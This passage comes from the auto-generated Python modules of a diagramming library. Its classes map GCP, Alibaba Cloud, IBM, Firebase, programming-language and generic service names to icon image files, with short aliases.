"network.png" class PartnerInterconnect(_Network): _icon = "partner-interconnect.png" class PremiumNetworkTier(_Network): _icon = "premium-network-tier.png" class Router(_Network): _icon = "router.png" class Routes(_Network): _icon = "routes.png" class StandardNetworkTier(_Network): _icon = "standard-network-tier.png" class TrafficDirector(_Network): _icon = "traffic-director.png" class VirtualPrivateCloud(_Network): _icon = "virtual-private-cloud.png" class VPN(_Network): _icon = "vpn.png" # Aliases VPC = VirtualPrivateCloud File: diagrams/gcp/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Analytics(_GCP): _type = "analytics" _icon_dir = "resources/gcp/analytics" class Bigquery(_Analytics): _icon = "bigquery.png" class Composer(_Analytics): _icon = "composer.png" class DataCatalog(_Analytics): _icon = "data-catalog.png" class DataFusion(_Analytics): _icon = "data-fusion.png" class Dataflow(_Analytics): _icon = "dataflow.png" class Datalab(_Analytics): _icon = "datalab.png" class Dataprep(_Analytics): _icon = "dataprep.png" class Dataproc(_Analytics): _icon = "dataproc.png" class Genomics(_Analytics): _icon = "genomics.png" class Pubsub(_Analytics): _icon = "pubsub.png" # Aliases BigQuery = Bigquery PubSub = Pubsub File: diagrams/gcp/migration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Migration(_GCP): _type = "migration" _icon_dir = "resources/gcp/migration" class TransferAppliance(_Migration): _icon = "transfer-appliance.png" # Aliases File: diagrams/gcp/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Iot(_GCP): _type = "iot" _icon_dir = "resources/gcp/iot" class IotCore(_Iot): _icon = "iot-core.png" # Aliases File: diagrams/gcp/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _GCP class _Compute(_GCP): _type = "compute" _icon_dir = "resources/gcp/compute" class AppEngine(_Compute): _icon = "app-engine.png" class ComputeEngine(_Compute): _icon = "compute-engine.png" class ContainerOptimizedOS(_Compute): _icon = "container-optimized-os.png" class Functions(_Compute): _icon = "functions.png" class GKEOnPrem(_Compute): _icon = "gke-on-prem.png" class GPU(_Compute): _icon = "gpu.png" class KubernetesEngine(_Compute): _icon = "kubernetes-engine.png" class Run(_Compute): _icon = "run.png" # Aliases GAE = AppEngine GCF = Functions GCE = ComputeEngine GKE = KubernetesEngine File: diagrams/alibabacloud/web.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Web(_AlibabaCloud): _type = "web" _icon_dir = "resources/alibabacloud/web" class Dns(_Web): _icon = "dns.png" class Domain(_Web): _icon = "domain.png" # Aliases File: diagrams/alibabacloud/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Database(_AlibabaCloud): _type = "database" _icon_dir = "resources/alibabacloud/database" class ApsaradbCassandra(_Database): _icon = "apsaradb-cassandra.png" class ApsaradbHbase(_Database): _icon = "apsaradb-hbase.png" class ApsaradbMemcache(_Database): _icon = "apsaradb-memcache.png" class ApsaradbMongodb(_Database): _icon = "apsaradb-mongodb.png" class ApsaradbOceanbase(_Database): _icon = "apsaradb-oceanbase.png" class ApsaradbPolardb(_Database): _icon = "apsaradb-polardb.png" class ApsaradbPostgresql(_Database): _icon = "apsaradb-postgresql.png" class ApsaradbPpas(_Database): _icon = "apsaradb-ppas.png" class ApsaradbRedis(_Database): _icon = "apsaradb-redis.png" class ApsaradbSqlserver(_Database): _icon = "apsaradb-sqlserver.png" class DataManagementService(_Database): _icon = "data-management-service.png" class DataTransmissionService(_Database): _icon = "data-transmission-service.png" class DatabaseBackupService(_Database): _icon = "database-backup-service.png" class DisributeRelationalDatabaseService(_Database): _icon = "disribute-relational-database-service.png" class GraphDatabaseService(_Database): _icon = "graph-database-service.png" class HybriddbForMysql(_Database): _icon = "hybriddb-for-mysql.png" class RelationalDatabaseService(_Database): _icon = "relational-database-service.png" # Aliases DMS = DataManagementService DTS = DataTransmissionService DBS = DatabaseBackupService DRDS = DisributeRelationalDatabaseService GDS = GraphDatabaseService RDS = RelationalDatabaseService File: diagrams/alibabacloud/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Security(_AlibabaCloud): _type = "security" _icon_dir = "resources/alibabacloud/security" class AntiBotService(_Security): _icon = "anti-bot-service.png" class AntiDdosBasic(_Security): _icon = "anti-ddos-basic.png" class AntiDdosPro(_Security): _icon = "anti-ddos-pro.png" class AntifraudService(_Security): _icon = "antifraud-service.png" class BastionHost(_Security): _icon = "bastion-host.png" class CloudFirewall(_Security): _icon = "cloud-firewall.png" class CloudSecurityScanner(_Security): _icon = "cloud-security-scanner.png" class ContentModeration(_Security): _icon = "content-moderation.png" class CrowdsourcedSecurityTesting(_Security): _icon = "crowdsourced-security-testing.png" class DataEncryptionService(_Security): _icon = "data-encryption-service.png" class DbAudit(_Security): _icon = "db-audit.png" class GameShield(_Security): _icon = "game-shield.png" class IdVerification(_Security): _icon = "id-verification.png" class ManagedSecurityService(_Security): _icon = "managed-security-service.png" class SecurityCenter(_Security): _icon = "security-center.png" class ServerGuard(_Security): _icon = "server-guard.png" class SslCertificates(_Security): _icon = "ssl-certificates.png" class WebApplicationFirewall(_Security): _icon = "web-application-firewall.png" # Aliases ABS = AntiBotService AS = AntifraudService CFW = CloudFirewall CM = ContentModeration DES = DataEncryptionService WAF = WebApplicationFirewall File: diagrams/alibabacloud/__init__.py """ AlibabaCloud provides a set of services for Alibaba Cloud provider. """ from diagrams import Node class _AlibabaCloud(Node): _provider = "alibabacloud" _icon_dir = "resources/alibabacloud" fontcolor = "#ffffff" File: diagrams/alibabacloud/application.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Application(_AlibabaCloud): _type = "application" _icon_dir = "resources/alibabacloud/application" class ApiGateway(_Application): _icon = "api-gateway.png" class BeeBot(_Application): _icon = "bee-bot.png" class BlockchainAsAService(_Application): _icon = "blockchain-as-a-service.png" class CloudCallCenter(_Application): _icon = "cloud-call-center.png" class CodePipeline(_Application): _icon = "code-pipeline.png" class DirectMail(_Application): _icon = "direct-mail.png" class LogService(_Application): _icon = "log-service.png" class MessageNotificationService(_Application): _icon = "message-notification-service.png" class NodeJsPerformancePlatform(_Application): _icon = "node-js-performance-platform.png" class OpenSearch(_Application): _icon = "open-search.png" class PerformanceTestingService(_Application): _icon = "performance-testing-service.png" class RdCloud(_Application): _icon = "rd-cloud.png" class SmartConversationAnalysis(_Application): _icon = "smart-conversation-analysis.png" class Yida(_Application): _icon = "yida.png" # Aliases SLS = LogService MNS = MessageNotificationService PTS = PerformanceTestingService SCA = SmartConversationAnalysis File: diagrams/alibabacloud/communication.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Communication(_AlibabaCloud): _type = "communication" _icon_dir = "resources/alibabacloud/communication" class DirectMail(_Communication): _icon = "direct-mail.png" class MobilePush(_Communication): _icon = "mobile-push.png" # Aliases File: diagrams/alibabacloud/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Storage(_AlibabaCloud): _type = "storage" _icon_dir = "resources/alibabacloud/storage" class CloudStorageGateway(_Storage): _icon = "cloud-storage-gateway.png" class FileStorageHdfs(_Storage): _icon = "file-storage-hdfs.png" class FileStorageNas(_Storage): _icon = "file-storage-nas.png" class HybridBackupRecovery(_Storage): _icon = "hybrid-backup-recovery.png" class HybridCloudDisasterRecovery(_Storage): _icon = "hybrid-cloud-disaster-recovery.png" class Imm(_Storage): _icon = "imm.png" class ObjectStorageService(_Storage): _icon = "object-storage-service.png" class ObjectTableStore(_Storage): _icon = "object-table-store.png" # Aliases HDFS = FileStorageHdfs NAS = FileStorageNas HBR = HybridBackupRecovery HDR = HybridCloudDisasterRecovery OSS = ObjectStorageService OTS = ObjectTableStore File: diagrams/alibabacloud/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Network(_AlibabaCloud): _type = "network" _icon_dir = "resources/alibabacloud/network" class Cdn(_Network): _icon = "cdn.png" class CloudEnterpriseNetwork(_Network): _icon = "cloud-enterprise-network.png" class ElasticIpAddress(_Network): _icon = "elastic-ip-address.png" class ExpressConnect(_Network): _icon = "express-connect.png" class NatGateway(_Network): _icon = "nat-gateway.png" class ServerLoadBalancer(_Network): _icon = "server-load-balancer.png" class SmartAccessGateway(_Network): _icon = "smart-access-gateway.png" class VirtualPrivateCloud(_Network): _icon = "virtual-private-cloud.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" # Aliases CEN = CloudEnterpriseNetwork EIP = ElasticIpAddress SLB = ServerLoadBalancer VPC = VirtualPrivateCloud File: diagrams/alibabacloud/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Analytics(_AlibabaCloud): _type = "analytics" _icon_dir = "resources/alibabacloud/analytics" class AnalyticDb(_Analytics): _icon = "analytic-db.png" class ClickHouse(_Analytics): _icon = "click-house.png" class DataLakeAnalytics(_Analytics): _icon = "data-lake-analytics.png" class ElaticMapReduce(_Analytics): _icon = "elatic-map-reduce.png" class OpenSearch(_Analytics): _icon = "open-search.png" # Aliases File: diagrams/alibabacloud/iot.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Iot(_AlibabaCloud): _type = "iot" _icon_dir = "resources/alibabacloud/iot" class IotInternetDeviceId(_Iot): _icon = "iot-internet-device-id.png" class IotLinkWan(_Iot): _icon = "iot-link-wan.png" class IotMobileConnectionPackage(_Iot): _icon = "iot-mobile-connection-package.png" class IotPlatform(_Iot): _icon = "iot-platform.png" # Aliases File: diagrams/alibabacloud/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AlibabaCloud class _Compute(_AlibabaCloud): _type = "compute" _icon_dir = "resources/alibabacloud/compute" class AutoScaling(_Compute): _icon = "auto-scaling.png" class BatchCompute(_Compute): _icon = "batch-compute.png" class ContainerRegistry(_Compute): _icon = "container-registry.png" class ContainerService(_Compute): _icon = "container-service.png" class ElasticComputeService(_Compute): _icon = "elastic-compute-service.png" class ElasticContainerInstance(_Compute): _icon = "elastic-container-instance.png" class ElasticHighPerformanceComputing(_Compute): _icon = "elastic-high-performance-computing.png" class ElasticSearch(_Compute): _icon = "elastic-search.png" class FunctionCompute(_Compute): _icon = "function-compute.png" class OperationOrchestrationService(_Compute): _icon = "operation-orchestration-service.png" class ResourceOrchestrationService(_Compute): _icon = "resource-orchestration-service.png" class ServerLoadBalancer(_Compute): _icon = "server-load-balancer.png" class ServerlessAppEngine(_Compute): _icon = "serverless-app-engine.png" class SimpleApplicationServer(_Compute): _icon = "simple-application-server.png" class WebAppService(_Compute): _icon = "web-app-service.png" # Aliases ESS = AutoScaling ECS = ElasticComputeService ECI = ElasticContainerInstance EHPC = ElasticHighPerformanceComputing FC = FunctionCompute OOS = OperationOrchestrationService ROS = ResourceOrchestrationService SLB = ServerLoadBalancer SAE = ServerlessAppEngine SAS = SimpleApplicationServer WAS = WebAppService File: diagrams/ibm/user.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _User(_IBM): _type = "user" _icon_dir = "resources/ibm/user" class Browser(_User): _icon = "browser.png" class Device(_User): _icon = "device.png" class IntegratedDigitalExperiences(_User): _icon = "integrated-digital-experiences.png" class PhysicalEntity(_User): _icon = "physical-entity.png" class Sensor(_User): _icon = "sensor.png" class User(_User): _icon = "user.png" # Aliases File: diagrams/ibm/social.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Social(_IBM): _type = "social" _icon_dir = "resources/ibm/social" class Communities(_Social): _icon = "communities.png" class FileSync(_Social): _icon = "file-sync.png" class LiveCollaboration(_Social): _icon = "live-collaboration.png" class Messaging(_Social): _icon = "messaging.png" class Networking(_Social): _icon = "networking.png" # Aliases File: diagrams/ibm/infrastructure.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Infrastructure(_IBM): _type = "infrastructure" _icon_dir = "resources/ibm/infrastructure" class Channels(_Infrastructure): _icon = "channels.png" class CloudMessaging(_Infrastructure): _icon = "cloud-messaging.png" class Dashboard(_Infrastructure): _icon = "dashboard.png" class Diagnostics(_Infrastructure): _icon = "diagnostics.png" class EdgeServices(_Infrastructure): _icon = "edge-services.png" class EnterpriseMessaging(_Infrastructure): _icon = "enterprise-messaging.png" class EventFeed(_Infrastructure): _icon = "event-feed.png" class InfrastructureServices(_Infrastructure): _icon = "infrastructure-services.png" class InterserviceCommunication(_Infrastructure): _icon = "interservice-communication.png" class LoadBalancingRouting(_Infrastructure): _icon = "load-balancing-routing.png" class MicroservicesMesh(_Infrastructure): _icon = "microservices-mesh.png" class MobileBackend(_Infrastructure): _icon = "mobile-backend.png" class MobileProviderNetwork(_Infrastructure): _icon = "mobile-provider-network.png" class MonitoringLogging(_Infrastructure): _icon = "monitoring-logging.png" class Monitoring(_Infrastructure): _icon = "monitoring.png" class PeerServices(_Infrastructure): _icon = "peer-services.png" class ServiceDiscoveryConfiguration(_Infrastructure): _icon = "service-discovery-configuration.png" class TransformationConnectivity(_Infrastructure): _icon = "transformation-connectivity.png" # Aliases File: diagrams/ibm/applications.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Applications(_IBM): _type = "applications" _icon_dir = "resources/ibm/applications" class ActionableInsight(_Applications): _icon = "actionable-insight.png" class Annotate(_Applications): _icon = "annotate.png" class ApiDeveloperPortal(_Applications): _icon = "api-developer-portal.png" class ApiPolyglotRuntimes(_Applications): _icon = "api-polyglot-runtimes.png" class AppServer(_Applications): _icon = "app-server.png" class ApplicationLogic(_Applications): _icon = "application-logic.png" class EnterpriseApplications(_Applications): _icon = "enterprise-applications.png" class Index(_Applications): _icon = "index.png" class IotApplication(_Applications): _icon = "iot-application.png" class Microservice(_Applications): _icon = "microservice.png" class MobileApp(_Applications): _icon = "mobile-app.png" class Ontology(_Applications): _icon = "ontology.png" class OpenSourceTools(_Applications): _icon = "open-source-tools.png" class RuntimeServices(_Applications): _icon = "runtime-services.png" class SaasApplications(_Applications): _icon = "saas-applications.png" class ServiceBroker(_Applications): _icon = "service-broker.png" class SpeechToText(_Applications): _icon = "speech-to-text.png" class VisualRecognition(_Applications): _icon = "visual-recognition.png" class Visualization(_Applications): _icon = "visualization.png" # Aliases File: diagrams/ibm/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Security(_IBM): _type = "security" _icon_dir = "resources/ibm/security" class ApiSecurity(_Security): _icon = "api-security.png" class BlockchainSecurityService(_Security): _icon = "blockchain-security-service.png" class DataSecurity(_Security): _icon = "data-security.png" class Firewall(_Security): _icon = "firewall.png" class Gateway(_Security): _icon = "gateway.png" class GovernanceRiskCompliance(_Security): _icon = "governance-risk-compliance.png" class IdentityAccessManagement(_Security): _icon = "identity-access-management.png" class IdentityProvider(_Security): _icon = "identity-provider.png" class InfrastructureSecurity(_Security): _icon = "infrastructure-security.png" class PhysicalSecurity(_Security): _icon = "physical-security.png" class SecurityMonitoringIntelligence(_Security): _icon = "security-monitoring-intelligence.png" class SecurityServices(_Security): _icon = "security-services.png" class TrustendComputing(_Security): _icon = "trustend-computing.png" class Vpn(_Security): _icon = "vpn.png" # Aliases File: diagrams/ibm/__init__.py """ IBM provides a set of services for IBM Cloud provider. """ from diagrams import Node class _IBM(Node): _provider = "ibm" _icon_dir = "resources/ibm" fontcolor = "#ffffff" File: diagrams/ibm/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Devops(_IBM): _type = "devops" _icon_dir = "resources/ibm/devops" class ArtifactManagement(_Devops): _icon = "artifact-management.png" class BuildTest(_Devops): _icon = "build-test.png" class CodeEditor(_Devops): _icon = "code-editor.png" class CollaborativeDevelopment(_Devops): _icon = "collaborative-development.png" class ConfigurationManagement(_Devops): _icon = "configuration-management.png" class ContinuousDeploy(_Devops): _icon = "continuous-deploy.png" class ContinuousTesting(_Devops): _icon = "continuous-testing.png" class Devops(_Devops): _icon = "devops.png" class Provision(_Devops): _icon = "provision.png" class ReleaseManagement(_Devops): _icon = "release-management.png" # Aliases File: diagrams/ibm/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Storage(_IBM): _type = "storage" _icon_dir = "resources/ibm/storage" class BlockStorage(_Storage): _icon = "block-storage.png" class ObjectStorage(_Storage): _icon = "object-storage.png" # Aliases File: diagrams/ibm/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Network(_IBM): _type = "network" _icon_dir = "resources/ibm/network" class Bridge(_Network): _icon = "bridge.png" class DirectLink(_Network): _icon = "direct-link.png" class Enterprise(_Network): _icon = "enterprise.png" class Firewall(_Network): _icon = "firewall.png" class FloatingIp(_Network): _icon = "floating-ip.png" class Gateway(_Network): _icon = "gateway.png" class InternetServices(_Network): _icon = "internet-services.png" class LoadBalancerListener(_Network): _icon = "load-balancer-listener.png" class LoadBalancerPool(_Network): _icon = "load-balancer-pool.png" class LoadBalancer(_Network): _icon = "load-balancer.png" class LoadBalancingRouting(_Network): _icon = "load-balancing-routing.png" class PublicGateway(_Network): _icon = "public-gateway.png" class Region(_Network): _icon = "region.png" class Router(_Network): _icon = "router.png" class Rules(_Network): _icon = "rules.png" class Subnet(_Network): _icon = "subnet.png" class TransitGateway(_Network): _icon = "transit-gateway.png" class Vpc(_Network): _icon = "vpc.png" class VpnConnection(_Network): _icon = "vpn-connection.png" class VpnGateway(_Network): _icon = "vpn-gateway.png" class VpnPolicy(_Network): _icon = "vpn-policy.png" # Aliases File: diagrams/ibm/management.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Management(_IBM): _type = "management" _icon_dir = "resources/ibm/management" class AlertNotification(_Management): _icon = "alert-notification.png" class ApiManagement(_Management): _icon = "api-management.png" class CloudManagement(_Management): _icon = "cloud-management.png" class ClusterManagement(_Management): _icon = "cluster-management.png" class ContentManagement(_Management): _icon = "content-management.png" class DataServices(_Management): _icon = "data-services.png" class DeviceManagement(_Management): _icon = "device-management.png" class InformationGovernance(_Management): _icon = "information-governance.png" class ItServiceManagement(_Management): _icon = "it-service-management.png" class Management(_Management): _icon = "management.png" class MonitoringMetrics(_Management): _icon = "monitoring-metrics.png" class ProcessManagement(_Management): _icon = "process-management.png" class ProviderCloudPortalService(_Management): _icon = "provider-cloud-portal-service.png" class PushNotifications(_Management): _icon = "push-notifications.png" class ServiceManagementTools(_Management): _icon = "service-management-tools.png" # Aliases File: diagrams/ibm/blockchain.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Blockchain(_IBM): _type = "blockchain" _icon_dir = "resources/ibm/blockchain" class BlockchainDeveloper(_Blockchain): _icon = "blockchain-developer.png" class Blockchain(_Blockchain): _icon = "blockchain.png" class CertificateAuthority(_Blockchain): _icon = "certificate-authority.png" class ClientApplication(_Blockchain): _icon = "client-application.png" class Communication(_Blockchain): _icon = "communication.png" class Consensus(_Blockchain): _icon = "consensus.png" class EventListener(_Blockchain): _icon = "event-listener.png" class Event(_Blockchain): _icon = "event.png" class ExistingEnterpriseSystems(_Blockchain): _icon = "existing-enterprise-systems.png" class HyperledgerFabric(_Blockchain): _icon = "hyperledger-fabric.png" class KeyManagement(_Blockchain): _icon = "key-management.png" class Ledger(_Blockchain): _icon = "ledger.png" class MembershipServicesProviderApi(_Blockchain): _icon = "membership-services-provider-api.png" class Membership(_Blockchain): _icon = "membership.png" class MessageBus(_Blockchain): _icon = "message-bus.png" class Node(_Blockchain): _icon = "node.png" class Services(_Blockchain): _icon = "services.png" class SmartContract(_Blockchain): _icon = "smart-contract.png" class TransactionManager(_Blockchain): _icon = "transaction-manager.png" class Wallet(_Blockchain): _icon = "wallet.png" # Aliases File: diagrams/ibm/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Analytics(_IBM): _type = "analytics" _icon_dir = "resources/ibm/analytics" class Analytics(_Analytics): _icon = "analytics.png" class DataIntegration(_Analytics): _icon = "data-integration.png" class DataRepositories(_Analytics): _icon = "data-repositories.png" class DeviceAnalytics(_Analytics): _icon = "device-analytics.png" class StreamingComputing(_Analytics): _icon = "streaming-computing.png" # Aliases File: diagrams/ibm/data.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Data(_IBM): _type = "data" _icon_dir = "resources/ibm/data" class Caches(_Data): _icon = "caches.png" class Cloud(_Data): _icon = "cloud.png" class ConversationTrainedDeployed(_Data): _icon = "conversation-trained-deployed.png" class DataServices(_Data): _icon = "data-services.png" class DataSources(_Data): _icon = "data-sources.png" class DeviceIdentityService(_Data): _icon = "device-identity-service.png" class DeviceRegistry(_Data): _icon = "device-registry.png" class EnterpriseData(_Data): _icon = "enterprise-data.png" class EnterpriseUserDirectory(_Data): _icon = "enterprise-user-directory.png" class FileRepository(_Data): _icon = "file-repository.png" class GroundTruth(_Data): _icon = "ground-truth.png" class Model(_Data): _icon = "model.png" class TmsDataInterface(_Data): _icon = "tms-data-interface.png" # Aliases File: diagrams/ibm/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _General(_IBM): _type = "general" _icon_dir = "resources/ibm/general" class CloudMessaging(_General): _icon = "cloud-messaging.png" class CloudServices(_General): _icon = "cloud-services.png" class Cloudant(_General): _icon = "cloudant.png" class CognitiveServices(_General): _icon = "cognitive-services.png" class DataSecurity(_General): _icon = "data-security.png" class Enterprise(_General): _icon = "enterprise.png" class GovernanceRiskCompliance(_General): _icon = "governance-risk-compliance.png" class IBMContainers(_General): _icon = "ibm-containers.png" class IBMPublicCloud(_General): _icon = "ibm-public-cloud.png" class IdentityAccessManagement(_General): _icon = "identity-access-management.png" class IdentityProvider(_General): _icon = "identity-provider.png" class InfrastructureSecurity(_General): _icon = "infrastructure-security.png" class Internet(_General): _icon = "internet.png" class IotCloud(_General): _icon = "iot-cloud.png" class MicroservicesApplication(_General): _icon = "microservices-application.png" class MicroservicesMesh(_General): _icon = "microservices-mesh.png" class MonitoringLogging(_General): _icon = "monitoring-logging.png" class Monitoring(_General): _icon = "monitoring.png" class ObjectStorage(_General): _icon = "object-storage.png" class OfflineCapabilities(_General): _icon = "offline-capabilities.png" class Openwhisk(_General): _icon = "openwhisk.png" class PeerCloud(_General): _icon = "peer-cloud.png" class RetrieveRank(_General): _icon = "retrieve-rank.png" class Scalable(_General): _icon = "scalable.png" class ServiceDiscoveryConfiguration(_General): _icon = "service-discovery-configuration.png" class TextToSpeech(_General): _icon = "text-to-speech.png" class TransformationConnectivity(_General): _icon = "transformation-connectivity.png" # Aliases File: diagrams/ibm/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Compute(_IBM): _type = "compute" _icon_dir = "resources/ibm/compute" class BareMetalServer(_Compute): _icon = "bare-metal-server.png" class ImageService(_Compute): _icon = "image-service.png" class Instance(_Compute): _icon = "instance.png" class Key(_Compute): _icon = "key.png" class PowerInstance(_Compute): _icon = "power-instance.png" # Aliases File: diagrams/firebase/extentions.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Extentions(_Firebase): _type = "extentions" _icon_dir = "resources/firebase/extentions" class Extensions(_Extentions): _icon = "extensions.png" # Aliases File: diagrams/firebase/grow.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Grow(_Firebase): _type = "grow" _icon_dir = "resources/firebase/grow" class ABTesting(_Grow): _icon = "ab-testing.png" class AppIndexing(_Grow): _icon = "app-indexing.png" class DynamicLinks(_Grow): _icon = "dynamic-links.png" class InAppMessaging(_Grow): _icon = "in-app-messaging.png" class Invites(_Grow): _icon = "invites.png" class Messaging(_Grow): _icon = "messaging.png" class Predictions(_Grow): _icon = "predictions.png" class RemoteConfig(_Grow): _icon = "remote-config.png" # Aliases FCM = Messaging File: diagrams/firebase/__init__.py """ Firebase provides a set of services for Firebase provider. """ from diagrams import Node class _Firebase(Node): _provider = "firebase" _icon_dir = "resources/firebase" fontcolor = "#ffffff" File: diagrams/firebase/develop.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Develop(_Firebase): _type = "develop" _icon_dir = "resources/firebase/develop" class Authentication(_Develop): _icon = "authentication.png" class Firestore(_Develop): _icon = "firestore.png" class Functions(_Develop): _icon = "functions.png" class Hosting(_Develop): _icon = "hosting.png" class MLKit(_Develop): _icon = "ml-kit.png" class RealtimeDatabase(_Develop): _icon = "realtime-database.png" class Storage(_Develop): _icon = "storage.png" # Aliases File: diagrams/firebase/quality.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Quality(_Firebase): _type = "quality" _icon_dir = "resources/firebase/quality" class AppDistribution(_Quality): _icon = "app-distribution.png" class CrashReporting(_Quality): _icon = "crash-reporting.png" class Crashlytics(_Quality): _icon = "crashlytics.png" class PerformanceMonitoring(_Quality): _icon = "performance-monitoring.png" class TestLab(_Quality): _icon = "test-lab.png" # Aliases File: diagrams/firebase/base.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Base(_Firebase): _type = "base" _icon_dir = "resources/firebase/base" class Firebase(_Base): _icon = "firebase.png" # Aliases File: diagrams/programming/framework.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Framework(_Programming): _type = "framework" _icon_dir = "resources/programming/framework" class Angular(_Framework): _icon = "angular.png" class Backbone(_Framework): _icon = "backbone.png" class Django(_Framework): _icon = "django.png" class Ember(_Framework): _icon = "ember.png" class Fastapi(_Framework): _icon = "fastapi.png" class Flask(_Framework): _icon = "flask.png" class Flutter(_Framework): _icon = "flutter.png" class Graphql(_Framework): _icon = "graphql.png" class Laravel(_Framework): _icon = "laravel.png" class Micronaut(_Framework): _icon = "micronaut.png" class Quarkus(_Framework): _icon = "quarkus.png" class Rails(_Framework): _icon = "rails.png" class React(_Framework): _icon = "react.png" class Spring(_Framework): _icon = "spring.png" class Starlette(_Framework): _icon = "starlette.png" class Svelte(_Framework): _icon = "svelte.png" class Vue(_Framework): _icon = "vue.png" # Aliases FastAPI = Fastapi GraphQL = Graphql File: diagrams/programming/__init__.py """ Programming provides a set of programming languages and frameworks. """ from diagrams import Node class _Programming(Node): _provider = "programming" _icon_dir = "resources/programming" fontcolor = "#ffffff" File: diagrams/programming/flowchart.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Flowchart(_Programming): _type = "flowchart" _icon_dir = "resources/programming/flowchart" class Action(_Flowchart): _icon = "action.png" class Collate(_Flowchart): _icon = "collate.png" class Database(_Flowchart): _icon = "database.png" class Decision(_Flowchart): _icon = "decision.png" class Delay(_Flowchart): _icon = "delay.png" class Display(_Flowchart): _icon = "display.png" class Document(_Flowchart): _icon = "document.png" class InputOutput(_Flowchart): _icon = "input-output.png" class Inspection(_Flowchart): _icon = "inspection.png" class InternalStorage(_Flowchart): _icon = "internal-storage.png" class LoopLimit(_Flowchart): _icon = "loop-limit.png" class ManualInput(_Flowchart): _icon = "manual-input.png" class ManualLoop(_Flowchart): _icon = "manual-loop.png" class Merge(_Flowchart): _icon = "merge.png" class MultipleDocuments(_Flowchart): _icon = "multiple-documents.png" class OffPageConnectorLeft(_Flowchart): _icon = "off-page-connector-left.png" class OffPageConnectorRight(_Flowchart): _icon = "off-page-connector-right.png" class Or(_Flowchart): _icon = "or.png" class PredefinedProcess(_Flowchart): _icon = "predefined-process.png" class Preparation(_Flowchart): _icon = "preparation.png" class Sort(_Flowchart): _icon = "sort.png" class StartEnd(_Flowchart): _icon = "start-end.png" class StoredData(_Flowchart): _icon = "stored-data.png" class SummingJunction(_Flowchart): _icon = "summing-junction.png" # Aliases File: diagrams/programming/runtime.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Runtime(_Programming): _type = "runtime" _icon_dir = "resources/programming/runtime" class Dapr(_Runtime): _icon = "dapr.png" # Aliases File: diagrams/programming/language.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Language(_Programming): _type = "language" _icon_dir = "resources/programming/language" class Bash(_Language): _icon = "bash.png" class C(_Language): _icon = "c.png" class Cpp(_Language): _icon = "cpp.png" class Csharp(_Language): _icon = "csharp.png" class Dart(_Language): _icon = "dart.png" class Elixir(_Language): _icon = "elixir.png" class Erlang(_Language): _icon = "erlang.png" class Go(_Language): _icon = "go.png" class Java(_Language): _icon = "java.png" class Javascript(_Language): _icon = "javascript.png" class Kotlin(_Language): _icon = "kotlin.png" class Latex(_Language): _icon = "latex.png" class Matlab(_Language): _icon = "matlab.png" class Nodejs(_Language): _icon = "nodejs.png" class Php(_Language): _icon = "php.png" class Python(_Language): _icon = "python.png" class R(_Language): _icon = "r.png" class Ruby(_Language): _icon = "ruby.png" class Rust(_Language): _icon = "rust.png" class Scala(_Language): _icon = "scala.png" class Swift(_Language): _icon = "swift.png" class Typescript(_Language): _icon = "typescript.png" # Aliases JavaScript = Javascript NodeJS = Nodejs PHP = Php TypeScript = Typescript File: diagrams/generic/place.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Place(_Generic): _type = "place" _icon_dir = "resources/generic/place" class Datacenter(_Place): _icon = "datacenter.png" # Aliases File: diagrams/generic/device.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Device(_Generic): _type = "device" _icon_dir = "resources/generic/device" class Mobile(_Device): _icon = "mobile.png" class Tablet(_Device): _icon = "tablet.png" # Aliases File: diagrams/generic/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Database(_Generic): _type = "database" _icon_dir = "resources/generic/database" class SQL(_Database): _icon = "sql.png" # Aliases File: diagrams/generic/os.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import 